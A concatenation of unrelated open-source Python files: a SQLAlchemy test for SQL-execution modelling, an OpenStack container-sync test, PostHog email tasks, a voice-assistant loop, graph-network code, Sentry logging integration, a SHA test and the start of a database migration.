id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String)
Base.metadata.create_all(engine)
# add a test-entry
test_entry = For14(id=14, description="test")
session = sqlalchemy.orm.Session(engine)
session.add(test_entry)
session.commit()
assert session.query(For14).all()[0].id == 14
# and now we can do the actual querying
text_foo = sqlalchemy.text("'FOO'") # $ constructedSql="'FOO'"
# filter_by is only vulnerable to injection if sqlalchemy.text is used, which is evident
# from the logs produced if this file is run
# that is, first filter_by results in the SQL
#
# SELECT for14.id AS for14_id, for14.description AS for14_description
# FROM for14
# WHERE for14.description = ?
#
# which is then called with the argument `'FOO'`
#
# and the second filter_by results in the SQL
#
# SELECT for14.id AS for14_id, for14.description AS for14_description
# FROM for14
# WHERE for14.description = 'FOO'
#
# which is then called without any arguments
assert session.query(For14).filter_by(description="'FOO'").all() == []
query = session.query(For14).filter_by(description=text_foo)
assert query.all() == []
# Initially I wanted to add lots of additional taint steps such that the normal SQL
# injection query would find these cases where an ORM query includes a TextClause that
# includes user-input directly... But that presented 2 problems:
#
# - which part of the query construction above should be marked as SQL to fit our
# `SqlExecution` concept. Nothing really fits this well, since all the SQL execution
# happens under the hood.
# - This would require a LOT of modeling for these additional taint steps, since there
# are many many constructs we would need to have models for. (see the 2 examples below)
#
# So instead we extended the SQL injection query to include TextClause construction as a
# sink directly.
# `filter` provides more general filtering
# see https://docs.sqlalchemy.org/en/14/orm/tutorial.html#common-filter-operators
# and https://docs.sqlalchemy.org/en/14/orm/query.html#sqlalchemy.orm.Query.filter
assert session.query(For14).filter(For14.description == "'FOO'").all() == []
query = session.query(For14).filter(For14.description == text_foo)
assert query.all() == []
assert session.query(For14).filter(For14.description.like("'FOO'")).all() == []
query = session.query(For14).filter(For14.description.like(text_foo))
assert query.all() == []
# There are many other possibilities for ending up with SQL injection, including the
# following (not an exhaustive list):
# - `where` (alias for `filter`)
# - `group_by`
# - `having`
# - `order_by`
# - `join`
# - `outerjoin`
# ==============================================================================
# v2.0
# ==============================================================================
import sqlalchemy.future
print("-"*80)
print("v2.0 style")
# For Engine, see https://docs.sqlalchemy.org/en/14/core/future.html#sqlalchemy.future.Engine
engine = sqlalchemy.create_engine("sqlite+pysqlite:///:memory:", echo=True, future=True)
future_engine = sqlalchemy.future.create_engine("sqlite+pysqlite:///:memory:", echo=True)
# in 2.0 you are not allowed to execute things directly on the engine
try:
engine.execute(raw_sql) # $ SPURIOUS: getSql=raw_sql
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
try:
engine.execute(text_sql) # $ SPURIOUS: getSql=text_sql
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
# `connect` returns a new Connection object.
# see https://docs.sqlalchemy.org/en/14/core/future.html#sqlalchemy.future.Connection
print("v2.0 engine.connect")
with engine.connect() as conn:
conn: sqlalchemy.future.Connection
# in 2.0 you are not allowed to use raw strings like this:
try:
conn.execute(raw_sql) # $ SPURIOUS: getSql=raw_sql
raise Exception("above not allowed in 2.0")
except sqlalchemy.exc.ObjectNotExecutableError:
pass
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = conn.exec_driver_sql(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
raw_conn = conn.connection
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
# branching not allowed in 2.0
try:
branched_conn = conn.connect()
raise Exception("above not allowed in 2.0")
except NotImplementedError:
pass
# connection with custom execution options
conn_with_custom_exe_opts = conn.execution_options(bar=1337)
result = conn_with_custom_exe_opts.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# `scalar` is shorthand helper
try:
conn.scalar(raw_sql) # $ SPURIOUS: getSql=raw_sql
except sqlalchemy.exc.ObjectNotExecutableError:
pass
scalar_result = conn.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = conn.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# This is a contrived example
select = sqlalchemy.select(sqlalchemy.text("'BAR'")) # $ constructedSql="'BAR'"
result = conn.execute(select) # $ getSql=select
assert result.fetchall() == [("BAR",)]
# This is a contrived example
select = sqlalchemy.select(sqlalchemy.literal_column("'BAZ'"))
result = conn.execute(select) # $ getSql=select
assert result.fetchall() == [("BAZ",)]
with future_engine.connect() as conn:
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# `begin` returns a new Connection object with a transaction begun.
print("v2.0 engine.begin")
with engine.begin() as conn:
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# construction by object
conn = sqlalchemy.future.Connection(engine)
result = conn.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# raw_connection
raw_conn = engine.raw_connection()
result = raw_conn.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
cursor = raw_conn.cursor()
cursor.execute(raw_sql) # $ getSql=raw_sql
assert cursor.fetchall() == [("FOO",)]
cursor.close()
# Session (2.0)
session = sqlalchemy.orm.Session(engine, future=True)
result = session.execute(raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=raw_sql) # $ getSql=raw_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
result = session.execute(statement=text_sql) # $ getSql=text_sql
assert result.fetchall() == [("FOO",)]
# scalar
scalar_result = session.scalar(raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=raw_sql) # $ getSql=raw_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
scalar_result = session.scalar(statement=text_sql) # $ getSql=text_sql
assert scalar_result == "FOO"
# Querying (2.0)
# uses a slightly different style than 1.4 -- see note about not modeling
# ORM query construction as SQL execution at the 1.4 query tests.
class For20(Base):
__tablename__ = "for20"
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
description = sqlalchemy.Column(sqlalchemy.String)
For20.metadata.create_all(engine)
# add a test-entry
test_entry = For20(id=20, description="test")
session = sqlalchemy.orm.Session(engine, future=True)
session.add(test_entry)
session.commit()
assert session.query(For20).all()[0].id == 20
# and now we can do the actual querying
# see https://docs.sqlalchemy.org/en/14/orm/session_basics.html#querying-2-0-style
statement = sqlalchemy.select(For20)
result = session.execute(statement) # $ getSql=statement
assert result.scalars().all()[0].id == 20
statement = sqlalchemy.select(For20).where(For20.description == text_foo)
result = session.execute(statement) # $ getSql=statement
assert result.scalars().all() == []
|
tempest/api/object_storage/test_container_sync.py | cityofships/tempest | 254 | 11195708 | <reponame>cityofships/tempest
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from urllib import parse as urlparse
import testtools
from tempest.api.object_storage import base
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
CONF = config.CONF
# This test can be quite long to run due to its
# dependency on container-sync process running interval.
# You can obviously reduce the container-sync interval in the
# container-server configuration.
class ContainerSyncTest(base.BaseObjectTest):
"""Test container synchronization"""
credentials = [['operator', CONF.object_storage.operator_role],
['operator_alt', CONF.object_storage.operator_role]]
@classmethod
def setup_credentials(cls):
super(ContainerSyncTest, cls).setup_credentials()
cls.os_alt = cls.os_roles_operator_alt
@classmethod
def setup_clients(cls):
super(ContainerSyncTest, cls).setup_clients()
cls.object_client_alt = cls.os_alt.object_client
cls.container_client_alt = cls.os_alt.container_client
@classmethod
def resource_setup(cls):
super(ContainerSyncTest, cls).resource_setup()
cls.containers = []
cls.objects = []
cls.clients = {}
# Default container-server config only allows localhost
cls.local_ip = '127.0.0.1'
cls.local_ip_v6 = '[::1]'
# Must be configure according to container-sync interval
container_sync_timeout = CONF.object_storage.container_sync_timeout
cls.container_sync_interval = \
CONF.object_storage.container_sync_interval
cls.attempts = \
int(container_sync_timeout / cls.container_sync_interval)
# define container and object clients
cls.clients[data_utils.rand_name(name='TestContainerSync')] = \
(cls.container_client, cls.object_client)
cls.clients[data_utils.rand_name(name='TestContainerSync')] = \
(cls.container_client_alt, cls.object_client_alt)
for cont_name, client in cls.clients.items():
client[0].create_container(cont_name)
cls.addClassResourceCleanup(base.delete_containers,
cont_name,
client[0],
client[1])
cls.containers.append(cont_name)
def _test_container_synchronization(self, make_headers):
# container to container synchronization
# to allow/accept sync requests to/from other accounts
# turn container synchronization on and create object in container
for cont in (self.containers, self.containers[::-1]):
cont_client = [self.clients[c][0] for c in cont]
obj_client = [self.clients[c][1] for c in cont]
headers = make_headers(cont[1], cont_client[1])
cont_client[0].put(str(cont[0]), body=None, headers=headers)
# create object in container
object_name = data_utils.rand_name(name='TestSyncObject')
data = object_name[::-1].encode() # Raw data, we need bytes
obj_client[0].create_object(cont[0], object_name, data)
self.objects.append(object_name)
# wait until container contents list is not empty
cont_client = [self.clients[c][0] for c in self.containers]
params = {'format': 'json'}
while self.attempts > 0:
object_lists = []
for c_client, cont in zip(cont_client, self.containers):
resp, object_list = c_client.list_container_objects(
cont, params=params)
object_lists.append(dict(
(obj['name'], obj) for obj in object_list))
# check that containers are not empty and have equal keys()
# or wait for next attempt
if object_lists[0] and object_lists[1] and \
set(object_lists[0].keys()) == set(object_lists[1].keys()):
break
else:
time.sleep(self.container_sync_interval)
self.attempts -= 1
self.assertEqual(object_lists[0], object_lists[1],
'Different object lists in containers.')
# Verify object content
obj_clients = [(self.clients[c][1], c) for c in self.containers]
for obj_client, cont in obj_clients:
for obj_name in object_lists[0]:
resp, object_content = obj_client.get_object(cont, obj_name)
self.assertEqual(object_content, obj_name[::-1].encode())
@decorators.attr(type='slow')
@decorators.unstable_test(bug='1317133')
@decorators.idempotent_id('be008325-1bba-4925-b7dd-93b58f22ce9b')
@testtools.skipIf(
not CONF.object_storage_feature_enabled.container_sync,
'Old-style container sync function is disabled')
def test_container_synchronization(self):
"""Test container synchronization"""
def make_headers(cont, cont_client):
# tell first container to synchronize to a second
# use rsplit with a maxsplit of 1 to ensure ipv6 adresses are
# handled properly as well
client_proxy_ip = urlparse.urlparse(
cont_client.base_url).netloc.rsplit(':', 1)[0]
if client_proxy_ip.startswith("["): # lazy check
client_base_url = \
cont_client.base_url.replace(client_proxy_ip,
self.local_ip_v6)
else:
client_base_url = \
cont_client.base_url.replace(client_proxy_ip,
self.local_ip)
headers = {'X-Container-Sync-Key': 'sync_key',
'X-Container-Sync-To': "%s/%s" %
(client_base_url, str(cont))}
return headers
self._test_container_synchronization(make_headers)
|
posthog/tasks/email.py | csmatar/posthog | 7,409 | 11195724 | import datetime
import logging
from typing import Optional
from posthog.celery import app
from posthog.email import EmailMessage, is_email_available
from posthog.models import Event, Organization, OrganizationInvite, PersonDistinctId, Team, User, organization
from posthog.templatetags.posthog_filters import compact_number
from posthog.utils import get_previous_week
logger = logging.getLogger(__name__)
def send_weekly_email_reports() -> None:
"""
Schedules an async task to send the weekly email report for each team.
"""
if not is_email_available():
logger.info("Skipping send_weekly_email_report because email is not properly configured")
return
for team in Team.objects.order_by("pk"):
_send_weekly_email_report_for_team.delay(team_id=team.pk)
@app.task(ignore_result=True, max_retries=1)
def _send_weekly_email_report_for_team(team_id: int) -> None:
"""
Sends the weekly email report to all users in a team.
"""
period_start, period_end = get_previous_week()
last_week_start: datetime.datetime = period_start - datetime.timedelta(7)
last_week_end: datetime.datetime = period_end - datetime.timedelta(7)
campaign_key: str = f"weekly_report_for_team_{team_id}_on_{period_start.strftime('%Y-%m-%d')}"
team = Team.objects.get(pk=team_id)
event_data_set = Event.objects.filter(team=team, timestamp__gte=period_start, timestamp__lte=period_end,)
active_users = PersonDistinctId.objects.filter(
distinct_id__in=event_data_set.values("distinct_id").distinct(),
).distinct()
active_users_count: int = active_users.count()
if active_users_count == 0:
# TODO: Send an email prompting fix to no active users
return
last_week_users = PersonDistinctId.objects.filter(
distinct_id__in=Event.objects.filter(team=team, timestamp__gte=last_week_start, timestamp__lte=last_week_end,)
.values("distinct_id")
.distinct(),
).distinct()
last_week_users_count: int = last_week_users.count()
two_weeks_ago_users = PersonDistinctId.objects.filter(
distinct_id__in=Event.objects.filter(
team=team,
timestamp__gte=last_week_start - datetime.timedelta(7),
timestamp__lte=last_week_end - datetime.timedelta(7),
)
.values("distinct_id")
.distinct(),
).distinct() # used to compute delta in churned users
two_weeks_ago_users_count: int = two_weeks_ago_users.count()
not_last_week_users = PersonDistinctId.objects.filter(
pk__in=active_users.difference(last_week_users,).values_list("pk", flat=True,)
) # users that were present this week but not last week
churned_count = last_week_users.difference(active_users).count()
churned_ratio: Optional[float] = (churned_count / last_week_users_count if last_week_users_count > 0 else None)
last_week_churn_ratio: Optional[float] = (
two_weeks_ago_users.difference(last_week_users).count() / two_weeks_ago_users_count
if two_weeks_ago_users_count > 0
else None
)
churned_delta: Optional[float] = (
churned_ratio / last_week_churn_ratio - 1 if last_week_churn_ratio else None # type: ignore
)
message = EmailMessage(
campaign_key=campaign_key,
subject=f"PostHog weekly report for {period_start.strftime('%b %d, %Y')} to {period_end.strftime('%b %d')}",
template_name="weekly_report",
template_context={
"preheader": f"Your PostHog weekly report is ready! Your team had {compact_number(active_users_count)} active users last week! 🎉",
"team": team.name,
"period_start": period_start,
"period_end": period_end,
"active_users": active_users_count,
"active_users_delta": active_users_count / last_week_users_count - 1 if last_week_users_count > 0 else None,
"user_distribution": {
"new": not_last_week_users.filter(person__created_at__gte=period_start).count() / active_users_count,
"retained": active_users.intersection(last_week_users).count() / active_users_count,
"resurrected": not_last_week_users.filter(person__created_at__lt=period_start).count()
/ active_users_count,
},
"churned_users": {"abs": churned_count, "ratio": churned_ratio, "delta": churned_delta},
},
)
for user in team.organization.members.all():
# TODO: Skip "unsubscribed" users
message.add_recipient(email=user.email, name=user.first_name)
message.send()
@app.task(max_retries=1)
def send_invite(invite_id: str) -> None:
campaign_key: str = f"invite_email_{invite_id}"
invite: OrganizationInvite = OrganizationInvite.objects.select_related("created_by", "organization").get(
id=invite_id
)
message = EmailMessage(
campaign_key=campaign_key,
subject=f"{invite.created_by.first_name} invited you to join {invite.organization.name} on PostHog",
template_name="invite",
template_context={"invite": invite},
reply_to=invite.created_by.email if invite.created_by and invite.created_by.email else "",
)
message.add_recipient(email=invite.target_email)
message.send()
@app.task(max_retries=1)
def send_member_join(invitee_uuid: str, organization_id: str) -> None:
invitee: User = User.objects.get(uuid=invitee_uuid)
organization: Organization = Organization.objects.get(id=organization_id)
campaign_key: str = f"member_join_email_org_{organization_id}_user_{invitee_uuid}"
message = EmailMessage(
campaign_key=campaign_key,
subject=f"{invitee.first_name} joined you on PostHog",
template_name="member_join",
template_context={"invitee": invitee, "organization": organization},
)
# Don't send this email to the new member themselves
members_to_email = organization.members.exclude(email=invitee.email)
if members_to_email:
for user in members_to_email:
message.add_recipient(email=user.email, name=user.first_name)
message.send()
|
client/conversation.py | kelvinhammond/jasper-client | 3,771 | 11195735 | <reponame>kelvinhammond/jasper-client<filename>client/conversation.py<gh_stars>1000+
# -*- coding: utf-8-*-
import logging
from notifier import Notifier
from brain import Brain
class Conversation(object):
def __init__(self, persona, mic, profile):
self._logger = logging.getLogger(__name__)
self.persona = persona
self.mic = mic
self.profile = profile
self.brain = Brain(mic, profile)
self.notifier = Notifier(profile)
def handleForever(self):
"""
Delegates user input to the handling function when activated.
"""
self._logger.info("Starting to handle conversation with keyword '%s'.",
self.persona)
while True:
# Print notifications until empty
notifications = self.notifier.getAllNotifications()
for notif in notifications:
self._logger.info("Received notification: '%s'", str(notif))
self._logger.debug("Started listening for keyword '%s'",
self.persona)
threshold, transcribed = self.mic.passiveListen(self.persona)
self._logger.debug("Stopped listening for keyword '%s'",
self.persona)
if not transcribed or not threshold:
self._logger.info("Nothing has been said or transcribed.")
continue
self._logger.info("Keyword '%s' has been said!", self.persona)
self._logger.debug("Started to listen actively with threshold: %r",
threshold)
input = self.mic.activeListenToAllOptions(threshold)
self._logger.debug("Stopped to listen actively with threshold: %r",
threshold)
if input:
self.brain.query(input)
else:
self.mic.say("Pardon?")
|
runtests.py | stefanor/pystemmer | 192 | 11195746 | #!/usr/bin/env python
import doctest
import sys
py3k = sys.version_info >= (3, 0)
if py3k:
num_failures, num_tests = doctest.testfile('docs/quickstart_python3.txt')
else:
num_failures, num_tests = doctest.testfile('docs/quickstart.txt')
if num_failures > 0:
print("%d failures out of %d tests" % (num_failures, num_tests))
sys.exit(1)
sys.exit(0)
|
code/extras/graph_representations.py | vamships/RelationPrediction | 376 | 11195748 | import numpy as np
from scipy.sparse import coo_matrix
import math
import tensorflow as tf
from model import Model
class MessageGraph():
sender_indices = None
receiver_indices = None
message_types = None
def __init__(self, edges, vertex_count, label_count):
self.vertex_count = vertex_count
self.label_count = label_count
self.edges = edges
self.process(self.edges)
def process(self, triplets):
triplets = tf.transpose(triplets)
self.sender_indices = triplets[0]
self.receiver_indices = triplets[2]
self.message_types = triplets[1]
self.edge_count = tf.shape(self.sender_indices)[0]
def get_sender_indices(self):
return self.sender_indices
def get_type_indices(self):
return self.message_types
def get_receiver_indices(self):
return self.receiver_indices
'''
def compute_normalized_values(self, receiver_indices, message_types):
if self.normalization[0] == "global":
mrs = receiver_indices
else:
mrs = [tuple(x) for x in np.vstack((receiver_indices, message_types)).transpose()]
counts = {}
for mr in mrs:
if mr in counts:
counts[mr] += 1.0
else:
counts[mr] = 1.0
return np.array([1.0 / counts[mr] for mr in mrs]).astype(np.float32)
def compute_sparse_mtr(self):
if self.normalization[0] != "none":
mtr_values = self.compute_normalized_mtr(self.receiver_indices, self.message_types)
else:
mtr_values = np.ones_like(self.message_types).astype(np.int32)
message_indices = np.arange(self.edge_count).astype(np.int32)
mtr_indices = np.vstack((self.receiver_indices, message_indices)).transpose()
mtr_shape = [self.vertex_count, self.edge_count]
return mtr_indices, mtr_values, mtr_shape
'''
def forward_incidence_matrix(self, normalization):
if normalization[0] == "none":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape)
return tensor
elif normalization[0] == "global":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
return tensor
elif normalization[0] == "local":
mtr_values = tf.to_float(tf.ones_like(self.receiver_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.message_types, self.receiver_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.label_count*2, self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
tensor = tf.sparse_reduce_sum_sparse(tensor, 0)
return tensor
def backward_incidence_matrix(self, normalization):
if normalization[0] == "none":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape)
return tensor
elif normalization[0] == "global":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
return tensor
elif normalization[0] == "local":
mtr_values = tf.to_float(tf.ones_like(self.sender_indices))
message_indices = tf.range(self.edge_count)
mtr_indices = tf.to_int64(tf.transpose(tf.stack([self.message_types, self.sender_indices, message_indices])))
mtr_shape = tf.to_int64(tf.stack([self.label_count*2, self.vertex_count, self.edge_count]))
tensor = tf.sparse_softmax(tf.SparseTensor(indices=mtr_indices,
values=mtr_values,
dense_shape=mtr_shape))
tensor = tf.sparse_reduce_sum_sparse(tensor, 0)
return tensor
class Representation(Model):
normalization="global"
graph = None
X = None
def __init__(self, triples, settings, bipartite=False):
self.triples = np.array(triples)
self.entity_count = settings['EntityCount']
self.relation_count = settings['RelationCount']
self.edge_count = self.triples.shape[0]*2
#self.process(self.triples)
#self.graph = None#MessageGraph(triples, self.entity_count, self.relation_count)
def get_graph(self):
if self.graph is None:
self.graph = MessageGraph(self.X, self.entity_count, self.relation_count)
return self.graph
def local_initialize_train(self):
self.X = tf.placeholder(tf.int32, shape=[None, 3], name='graph_edges')
def local_get_train_input_variables(self):
return [self.X]
def local_get_test_input_variables(self):
return [self.X]
'''
def compute_normalized_values(self, receiver_indices, message_types):
if self.normalization == "global":
mrs = receiver_indices
else:
mrs = [tuple(x) for x in np.vstack((receiver_indices, message_types)).transpose()]
counts = {}
for mr in mrs:
if mr in counts:
counts[mr] += 1.0
else:
counts[mr] = 1.0
return np.array([1.0 / counts[mr] for mr in mrs]).astype(np.float32)
def compute_sparse_mtr(self):
if self.normalization != "none":
mtr_values = self.compute_normalized_values(self.receiver_indices, self.message_types)
else:
mtr_values = np.ones_like(self.message_types).astype(np.int32)
message_indices = np.arange(self.edge_count).astype(np.int32)
mtr_indices = np.vstack((self.receiver_indices, message_indices)).transpose()
mtr_shape = [self.entity_count, self.edge_count]
return mtr_indices, mtr_values, mtr_shape
def process(self, triplets):
triplets = triplets.transpose()
self.sender_indices = np.hstack((triplets[0], triplets[2])).astype(np.int32)
self.receiver_indices = np.hstack((triplets[2], triplets[0])).astype(np.int32)
self.message_types = np.hstack(
(triplets[1], triplets[1] + self.relation_count)).astype(np.int32)
'''
|
sentry_sdk/integrations/logging.py | olasd/sentry-python | 553 | 11195749 | from __future__ import absolute_import
import logging
import datetime
from sentry_sdk.hub import Hub
from sentry_sdk.utils import (
to_string,
event_from_exception,
current_stacktrace,
capture_internal_exceptions,
)
from sentry_sdk.integrations import Integration
from sentry_sdk._compat import iteritems
from sentry_sdk._types import MYPY
if MYPY:
from logging import LogRecord
from typing import Any
from typing import Dict
from typing import Optional
DEFAULT_LEVEL = logging.INFO
DEFAULT_EVENT_LEVEL = logging.ERROR
_IGNORED_LOGGERS = set(["sentry_sdk.errors"])
def ignore_logger(
name # type: str
):
# type: (...) -> None
"""This disables recording (both in breadcrumbs and as events) calls to
a logger of a specific name. Among other uses, many of our integrations
use this to prevent their actions being recorded as breadcrumbs. Exposed
to users as a way to quiet spammy loggers.
:param name: The name of the logger to ignore (same string you would pass to ``logging.getLogger``).
"""
_IGNORED_LOGGERS.add(name)
class LoggingIntegration(Integration):
identifier = "logging"
def __init__(self, level=DEFAULT_LEVEL, event_level=DEFAULT_EVENT_LEVEL):
# type: (Optional[int], Optional[int]) -> None
self._handler = None
self._breadcrumb_handler = None
if level is not None:
self._breadcrumb_handler = BreadcrumbHandler(level=level)
if event_level is not None:
self._handler = EventHandler(level=event_level)
def _handle_record(self, record):
# type: (LogRecord) -> None
if self._handler is not None and record.levelno >= self._handler.level:
self._handler.handle(record)
if (
self._breadcrumb_handler is not None
and record.levelno >= self._breadcrumb_handler.level
):
self._breadcrumb_handler.handle(record)
@staticmethod
def setup_once():
# type: () -> None
old_callhandlers = logging.Logger.callHandlers # type: ignore
def sentry_patched_callhandlers(self, record):
# type: (Any, LogRecord) -> Any
try:
return old_callhandlers(self, record)
finally:
# This check is done twice, once also here before we even get
# the integration. Otherwise we have a high chance of getting
# into a recursion error when the integration is resolved
# (this also is slower).
if record.name not in _IGNORED_LOGGERS:
integration = Hub.current.get_integration(LoggingIntegration)
if integration is not None:
integration._handle_record(record)
logging.Logger.callHandlers = sentry_patched_callhandlers # type: ignore
def _can_record(record):
# type: (LogRecord) -> bool
return record.name not in _IGNORED_LOGGERS
def _breadcrumb_from_record(record):
# type: (LogRecord) -> Dict[str, Any]
return {
"ty": "log",
"level": _logging_to_event_level(record.levelname),
"category": record.name,
"message": record.message,
"timestamp": datetime.datetime.utcfromtimestamp(record.created),
"data": _extra_from_record(record),
}
def _logging_to_event_level(levelname):
# type: (str) -> str
return {"critical": "fatal"}.get(levelname.lower(), levelname.lower())
COMMON_RECORD_ATTRS = frozenset(
(
"args",
"created",
"exc_info",
"exc_text",
"filename",
"funcName",
"levelname",
"levelno",
"linenno",
"lineno",
"message",
"module",
"msecs",
"msg",
"name",
"pathname",
"process",
"processName",
"relativeCreated",
"stack",
"tags",
"thread",
"threadName",
"stack_info",
)
)
def _extra_from_record(record):
# type: (LogRecord) -> Dict[str, None]
return {
k: v
for k, v in iteritems(vars(record))
if k not in COMMON_RECORD_ATTRS
and (not isinstance(k, str) or not k.startswith("_"))
}
class EventHandler(logging.Handler, object):
"""
A logging handler that emits Sentry events for each log record
Note that you do not have to use this class if the logging integration is enabled, which it is by default.
"""
def emit(self, record):
# type: (LogRecord) -> Any
with capture_internal_exceptions():
self.format(record)
return self._emit(record)
def _emit(self, record):
# type: (LogRecord) -> None
if not _can_record(record):
return
hub = Hub.current
if hub.client is None:
return
client_options = hub.client.options
# exc_info might be None or (None, None, None)
if record.exc_info is not None and record.exc_info[0] is not None:
event, hint = event_from_exception(
record.exc_info,
client_options=client_options,
mechanism={"type": "logging", "handled": True},
)
elif record.exc_info and record.exc_info[0] is None:
event = {}
hint = {}
with capture_internal_exceptions():
event["threads"] = {
"values": [
{
"stacktrace": current_stacktrace(
client_options["with_locals"]
),
"crashed": False,
"current": True,
}
]
}
else:
event = {}
hint = {}
hint["log_record"] = record
event["level"] = _logging_to_event_level(record.levelname)
event["logger"] = record.name
event["logentry"] = {"message": to_string(record.msg), "params": record.args}
event["extra"] = _extra_from_record(record)
hub.capture_event(event, hint=hint)
# Legacy name
SentryHandler = EventHandler
class BreadcrumbHandler(logging.Handler, object):
"""
A logging handler that records breadcrumbs for each log record.
Note that you do not have to use this class if the logging integration is enabled, which it is by default.
"""
def emit(self, record):
# type: (LogRecord) -> Any
with capture_internal_exceptions():
self.format(record)
return self._emit(record)
def _emit(self, record):
# type: (LogRecord) -> None
if not _can_record(record):
return
Hub.current.add_breadcrumb(
_breadcrumb_from_record(record), hint={"log_record": record}
)
|
Src/StdLib/Lib/test/test_sha.py | cwensley/ironpython2 | 2,209 | 11195751 | # Testing sha module (NIST's Secure Hash Algorithm)
# use the three examples from Federal Information Processing Standards
# Publication 180-1, Secure Hash Standard, 1995 April 17
# http://www.itl.nist.gov/div897/pubs/fip180-1.htm
import warnings
warnings.filterwarnings("ignore", "the sha module is deprecated.*",
DeprecationWarning)
import sha
import unittest
from test import test_support
class SHATestCase(unittest.TestCase):
def check(self, data, digest):
# Check digest matches the expected value
obj = sha.new(data)
computed = obj.hexdigest()
self.assertTrue(computed == digest)
# Verify that the value doesn't change between two consecutive
# digest operations.
computed_again = obj.hexdigest()
self.assertTrue(computed == computed_again)
# Check hexdigest() output matches digest()'s output
digest = obj.digest()
hexd = ""
for c in digest:
hexd += '%02x' % ord(c)
self.assertTrue(computed == hexd)
def test_case_1(self):
self.check("abc",
"a9993e364706816aba3e25717850c26c9cd0d89d")
def test_case_2(self):
self.check("abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"84983e441c3bd26ebaae4aa1f95129e5e54670f1")
def test_case_3(self):
self.check("a" * 1000000,
"34aa973cd4c4daa4f61eeb2bdbad27316534016f")
def test_case_4(self):
self.check(chr(0xAA) * 80,
'4ca0ef38f1794b28a8f8ee110ee79d48ce13be25')
def test_main():
test_support.run_unittest(SHATestCase)
if __name__ == "__main__":
test_main()
|
migrations/versions/166d65e5a7e3_add_aggregatetest_gr.py | vault-the/changes | 443 | 11195760 | """Add AggregateTest{Group,Suite}
Revision ID: 166d65e5a7e3
Revises: 2<PASSWORD>c3b2<PASSWORD>
Create Date: 2013-12-04 13:19:26.702555
"""
# revision identifiers, used by Alembic.
revision = '166d65e5<PASSWORD>'
down_revision = '21b7c3b2ce88'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'aggtestsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('first_build_id', sa.GUID(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['first_build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint(
'project_id', 'name_sha', name='unq_aggtestsuite_key')
)
op.create_index('idx_aggtestsuite_first_build_id', 'aggtestsuite', ['first_build_id'])
op.create_table(
'aggtestgroup',
